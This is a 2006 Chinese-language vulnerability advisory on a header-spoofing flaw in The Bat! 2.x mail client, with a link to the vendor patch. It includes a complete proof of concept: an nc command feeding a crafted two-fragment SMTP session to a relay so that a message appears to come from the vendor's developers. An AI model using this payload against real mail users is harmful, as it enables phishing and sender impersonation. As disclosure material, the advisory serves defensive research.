安全研究
安全漏洞
The Bat! 2.x邮件头部可伪造漏洞
发布日期:2006-02-05
更新日期:2006-02-05
受影响系统:
Rit Research Labs The Bat! 2.x不受影响系统:
Rit Research Labs The Bat! 3.5描述:
The Bat!是一款方便易用的邮件客户端。
The Bat!显示消息的方式存在漏洞,远程攻击者可能利用此漏洞假造邮件的头部信息,隐藏邮件的真正来源。
The Bat!自动重组分片的邮件,而显示的邮件头为重组后邮件的,允许攻击者欺骗隐藏消息的RFC 822头部,包括“_all_Received:”和“Message-ID:”等字段,这样攻击者就可以创建伪造了来源的邮件。
<*来源:3APA3A (3APA3A@security.nnov.ru)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113925620110345&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
nc ip_of_smtp_relay 25 <thebatexploit.txt
-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <phiby@example.com>
RCPT TO: <phiby@example.com>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <phiby@example.com>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
Message-ID: <p#1split@ACB0994591752.20060130184706@thebat.net>
MIME-Version: 1.0
Content-Type: message/partial; id="split@ACB0994591752.20060130184706@thebat.net";
number=1; total=2
Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
for <phiby@example.com>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <bugs@thebat.net>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit
Dear Phiby,
Best wishes for you and http://phiby.com/
.
RSET
MAIL FROM: <phiby@example.com>
RCPT TO: <phiby@example.com>
DATA
Date: Mon, 30 Jan 2006 13:30:06 +0300
From: 3APA3A <phiby@example.com>
Organization: http://www.security.nnov.ru/
X-Mailer: The Bat! (v2.12.00)
Organization: Microsoft
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
Message-ID: <p#2split@ACB0994591752.20060130184706@microsof.com>
MIME-Version: 1.0
Content-Type: message/partial; id="split@ACB0994591752.20060130184706@thebat.net";
number=2; total=2
Yours, The Bat! develpment team.
.
QUIT
-=-=-=-=- end thebatexploit.txt -=-=-=-=-
建议:
厂商补丁:
Rit Research Labs
-----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://thebat.net/en/products/thebat/download.php
浏览次数:3682
严重程度:0(网友投票)
绿盟科技给您安全的保障